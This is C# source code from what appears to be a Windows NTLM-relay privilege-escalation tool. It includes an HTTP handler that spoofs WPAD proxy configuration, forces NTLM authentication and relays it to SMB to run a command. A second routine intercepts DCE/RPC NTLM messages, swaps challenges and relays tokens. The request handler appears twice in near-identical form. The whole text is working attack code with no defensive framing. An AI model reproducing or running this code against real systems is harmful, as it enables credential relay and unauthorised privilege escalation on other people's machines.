public void recvRequest(object sender, HttpRequestEventArgs e) { using (var writer = new StreamWriter(e.Response.OutputStream)) { HttpRequest request = e.Request; // Obtain a response object. HttpResponse response = e.Response; // Construct a response. System.Collections.Specialized.NameValueCollection headers = request.Headers; Console.WriteLine("Got Request: "+request.HttpMethod+" "+request.Url.AbsoluteUri.ToString()+"!"); if (request.HttpMethod.ToLower().Equals("head") || request.HttpMethod.ToLower().Equals("get") || request.HttpMethod.ToLower().Equals("post") || request.HttpMethod.ToLower().Equals("options") || request.HttpMethod.ToLower().Equals("put")) { if (request.Url.AbsoluteUri.ToString().Contains("GETHASHES")) { Console.WriteLine("Sending 401..."); if (headers["Authorization"] == null && workingUri == null) { Console.WriteLine("Got request for hashes..."); response.Headers.Add("WWW-Authenticate","NTLM"); response.StatusCode = 401; state = 0; } else { String authHeader = headers["Authorization"]; byte[] ntlmBlock = getNtlmBlock(authHeader); if (ntlmBlock != null && (workingUri == null || workingUri == request.Url.AbsoluteUri.ToString())) { workingUri = request.Url.AbsoluteUri.ToString(); if (state == 0) { Console.WriteLine("Parsing initial NTLM auth...\n"+authHeader); smbRelayThread = new Thread(()=>smbRelay.startSMBRelay(ntlmQueue,this.cmd)); ntlmQueue.Clear(); smbRelayThread.Start(); ntlmQueue.Enqueue(ntlmBlock); byte[] challenge = null; Config.signalHandlerClient.WaitOne(); challenge = ntlmQueue.Dequeue(); Console.WriteLine("Got SMB challenge " + Convert.ToBase64String(challenge)); if(challenge != null){ response.Headers.Add("WWW-Authenticate","NTLM " + Convert.ToBase64String(challenge)); state = state + 1; response.StatusCode = 401; } } else if (state == 1 && request.Url.AbsoluteUri.ToString().Equals(workingUri)) { Console.WriteLine("Parsing final auth..."); if (ntlmBlock[8] == 3) { Console.WriteLine(Convert.ToBase64String(ntlmBlock)); } ntlmQueue.Enqueue(ntlmBlock); Config.signalHandler.Set(); response.StatusCode = 200; state = state + 1; Config.signalHandlerClient.WaitOne(); byte[] checkStatus = ntlmQueue.Dequeue(); if (checkStatus[0] == 99) { writer.Close(); smbRelayThread.Abort(); finished.Set(); return; } else { workingUri = null; smbRelayThread.Abort(); ntlmQueue = new Queue<byte[]>(); smbRelay = new SMBRelay(); writer.Close(); state = 0; } } } } writer.Close(); return; } else if (request.Url.AbsoluteUri.ToString().Equals("http://127.0.0.1/wpad.dat") || request.Url.AbsoluteUri.ToString().Equals("http://wpad/wpad.dat")) { Console.WriteLine("Spoofing wpad..."); response.StatusCode = 200; String responseTxt = "function FindProxyForURL(url,host){if (dnsDomainIs(host, \"localhost\")) return \"DIRECT\";"; for (int i = 0; i < wpad_exclude.Length;i++ ) { responseTxt = responseTxt + "if (dnsDomainIs(host, \"" + wpad_exclude[i] + "\")) return \"DIRECT\";"; } responseTxt = responseTxt + "return \"PROXY 127.0.0.1:80\";}"; writer.Write(responseTxt); } else if (workingUri == null && !request.Url.AbsoluteUri.ToString().Contains("wpad") && !request.Url.AbsoluteUri.ToString().Contains("favicon")) { Random rnd = new Random(); int sess = rnd.Next(1, 1000000); response.Headers.Add("Location", "http://localhost:"+srvPort+"/GETHASHES"+sess); Console.WriteLine("Redirecting to target.."+response.Headers["Location"]); response.StatusCode = 302; writer.Close(); } } else if (request.HttpMethod.ToLower().Equals("propfind")) { if (request.Url.AbsoluteUri.ToString().Equals("http://localhost/test")) { Console.WriteLine("Got PROPFIND for /test... Responding"); response.StatusCode = 207; response.ContentType = "application/xml"; writer.Write("<?xml version='1.0' encoding='UTF-8'?><ns0:multistatus xmlns:ns0=\"DAV:\"><ns0:response><ns0:href>/test/</ns0:href><ns0:propstat><ns0:prop><ns0:resourcetype><ns0:collection /></ns0:resourcetype><ns0:creationdate>2015-08-03T14:53:38Z</ns0:creationdate><ns0:getlastmodified>Tue, 11 Aug 2015 15:48:25 GMT</ns0:getlastmodified><ns0:displayname>test</ns0:displayname><ns0:lockdiscovery /><ns0:supportedlock><ns0:lockentry><ns0:lockscope><ns0:exclusive /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry><ns0:lockentry><ns0:lockscope><ns0:shared /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry></ns0:supportedlock></ns0:prop><ns0:status>HTTP/1.1 200 OK</ns0:status></ns0:propstat></ns0:response></ns0:multistatus>"); writer.Close(); } else { Console.WriteLine("Got PROPFIND for "+request.Url.AbsoluteUri.ToString()+" returning 404"); response.StatusCode = 404; writer.Close(); } } else { Console.WriteLine("Got " + request.HttpMethod + " for " + request.Url.AbsoluteUri.ToString()+" replying 404"); response.StatusCode = 404; writer.Close(); } } }
public void recvRequest(object sender, HttpRequestEventArgs e) { using (var writer = new StreamWriter(e.Response.OutputStream)) { HttpRequest request = e.Request; // Obtain a response object. HttpResponse response = e.Response; // Construct a response. System.Collections.Specialized.NameValueCollection headers = request.Headers; Console.WriteLine("Got Request: " + request.HttpMethod + " " + request.Url.AbsoluteUri.ToString() + "!"); if (request.HttpMethod.ToLower().Equals("head") || request.HttpMethod.ToLower().Equals("get") || request.HttpMethod.ToLower().Equals("post") || request.HttpMethod.ToLower().Equals("options") || request.HttpMethod.ToLower().Equals("put")) { if (request.Url.AbsoluteUri.ToString().Contains("GETHASHES")) { Console.WriteLine("Sending 401..."); if (headers["Authorization"] == null && workingUri == null) { Console.WriteLine("Got request for hashes..."); response.Headers.Add("WWW-Authenticate", "NTLM"); response.StatusCode = 401; state = 0; } else { String authHeader = headers["Authorization"]; byte[] ntlmBlock = getNtlmBlock(authHeader); if (ntlmBlock != null && (workingUri == null || workingUri == request.Url.AbsoluteUri.ToString())) { workingUri = request.Url.AbsoluteUri.ToString(); if (state == 0) { Console.WriteLine("Parsing initial NTLM auth...\n" + authHeader); smbRelayThread = new Thread(() => smbRelay.startSMBRelay(ntlmQueue, this.cmd)); ntlmQueue.Clear(); smbRelayThread.Start(); ntlmQueue.Enqueue(ntlmBlock); byte[] challenge = null; Config.signalHandlerClient.WaitOne(); challenge = ntlmQueue.Dequeue(); Console.WriteLine("Got SMB challenge " + Convert.ToBase64String(challenge)); if (challenge != null) { response.Headers.Add("WWW-Authenticate", "NTLM " + Convert.ToBase64String(challenge)); state = state + 1; response.StatusCode = 401; } } else if (state == 1 && request.Url.AbsoluteUri.ToString().Equals(workingUri)) { Console.WriteLine("Parsing final auth..."); if (ntlmBlock[8] == 3) { Console.WriteLine(Convert.ToBase64String(ntlmBlock)); } ntlmQueue.Enqueue(ntlmBlock); Config.signalHandler.Set(); response.StatusCode = 200; state = state + 1; Config.signalHandlerClient.WaitOne(); byte[] checkStatus = ntlmQueue.Dequeue(); if (checkStatus[0] == 99) { writer.Close(); smbRelayThread.Abort(); finished.Set(); return; } else { workingUri = null; smbRelayThread.Abort(); ntlmQueue = new Queue <byte[]>(); smbRelay = new SMBRelay(); writer.Close(); state = 0; } } } } writer.Close(); return; } else if (request.Url.AbsoluteUri.ToString().Equals("http://127.0.0.1/wpad.dat") || request.Url.AbsoluteUri.ToString().Equals("http://wpad/wpad.dat")) { Console.WriteLine("Spoofing wpad..."); response.StatusCode = 200; String responseTxt = "function FindProxyForURL(url,host){if (dnsDomainIs(host, \"localhost\")) return \"DIRECT\";"; for (int i = 0; i < wpad_exclude.Length; i++) { responseTxt = responseTxt + "if (dnsDomainIs(host, \"" + wpad_exclude[i] + "\")) return \"DIRECT\";"; } responseTxt = responseTxt + "return \"PROXY 127.0.0.1:80\";}"; writer.Write(responseTxt); } else if (workingUri == null && !request.Url.AbsoluteUri.ToString().Contains("wpad") && !request.Url.AbsoluteUri.ToString().Contains("favicon")) { Random rnd = new Random(); int sess = rnd.Next(1, 1000000); response.Headers.Add("Location", "http://localhost:" + srvPort + "/GETHASHES" + sess); Console.WriteLine("Redirecting to target.." + response.Headers["Location"]); response.StatusCode = 302; writer.Close(); } } else if (request.HttpMethod.ToLower().Equals("propfind")) { if (request.Url.AbsoluteUri.ToString().Equals("http://localhost/test")) { Console.WriteLine("Got PROPFIND for /test... Responding"); response.StatusCode = 207; response.ContentType = "application/xml"; writer.Write("<?xml version='1.0' encoding='UTF-8'?><ns0:multistatus xmlns:ns0=\"DAV:\"><ns0:response><ns0:href>/test/</ns0:href><ns0:propstat><ns0:prop><ns0:resourcetype><ns0:collection /></ns0:resourcetype><ns0:creationdate>2015-08-03T14:53:38Z</ns0:creationdate><ns0:getlastmodified>Tue, 11 Aug 2015 15:48:25 GMT</ns0:getlastmodified><ns0:displayname>test</ns0:displayname><ns0:lockdiscovery /><ns0:supportedlock><ns0:lockentry><ns0:lockscope><ns0:exclusive /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry><ns0:lockentry><ns0:lockscope><ns0:shared /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry></ns0:supportedlock></ns0:prop><ns0:status>HTTP/1.1 200 OK</ns0:status></ns0:propstat></ns0:response></ns0:multistatus>"); writer.Close(); } else { Console.WriteLine("Got PROPFIND for " + request.Url.AbsoluteUri.ToString() + " returning 404"); response.StatusCode = 404; writer.Close(); } } else { Console.WriteLine("Got " + request.HttpMethod + " for " + request.Url.AbsoluteUri.ToString() + " replying 404"); response.StatusCode = 404; writer.Close(); } } }
private byte[] doNTLMMagic(byte[] buf) { byte[] ret_bytes = buf; if (smbRelayThread == null) { SMBRelay smbRelay = new SMBRelay(); smbRelayThread = new Thread(() => smbRelay.startSMBRelay(NTLMRelayingProxy.ntlmQueue, cmd)); } if (tokenRelayThread == null) { SSPIHelper tokenRelay = new SSPIHelper(); tokenRelayThread = new Thread(() => tokenRelay.TokenRelay(new_ntlmQueueIn, new_ntlmQueueOut)); } try { byte[] ntlm_bytes = NTLMExtract(buf); if (ntlm_bytes != null) { if (ntlm_bytes[8] == 1) { if (enable_token != null) { Console.WriteLine("GOT TYPE1 MESSAGE TOKEN-RELAY!"); new_ntlmQueueIn.Add(ntlm_bytes); tokenRelayThread.Start(); challenge = new_ntlmQueueOut.Take(); } else if (!smbRelayThread.IsAlive) { Console.WriteLine("GOT TYPE1 MESSAGE"); ntlmQueue.Enqueue(ntlm_bytes); smbRelayThread.Start(); Config.signalHandlerClient.WaitOne(); challenge = ntlmQueue.Dequeue(); } } else if (ntlm_bytes[8] == 2) { Console.WriteLine("GOT TYPE2 MESSAGE (CHALLENGE) from RPCs"); if (challengeCount > 0 || !dropFirst) { ret_bytes = replaceChallenge(buf, challenge); } challengeCount = challengeCount + 1; } else if (ntlm_bytes[8] == 3) { if (enable_token != null) { Console.WriteLine("GOT TYPE3 MESSAGE (AUTH) TOKEN-RELAY"); new_ntlmQueueIn.Add(ntlm_bytes); byte[] checkStatus = new_ntlmQueueOut.Take(); if (checkStatus[0] == 99) { Thread.Sleep(500); // Incase its not finished! tokenRelayThread.Abort(); DCERPCNtlmHandler.finished.Set(); // this.disconnected.Set(); } else { new_ntlmQueueIn = new BlockingCollection <byte[]>(); new_ntlmQueueOut = new BlockingCollection <byte[]>(); challengeCount = 0; tokenRelayThread = null; } } else { Console.WriteLine("GOT TYPE3 MESSAGE (AUTH)"); ntlmQueue.Enqueue(ntlm_bytes); Config.signalHandler.Set(); Config.signalHandlerClient.WaitOne(); byte[] checkStatus = ntlmQueue.Dequeue(); Config.signalHandler.Set(); if (checkStatus[0] == 99) { Thread.Sleep(500); smbRelayThread.Abort(); tokenRelayThread.Abort(); DCERPCNtlmHandler.finished.Set(); // this.disconnected.Set(); } } } } } catch (Exception e) { Console.WriteLine(e); return(ret_bytes); } return(ret_bytes); }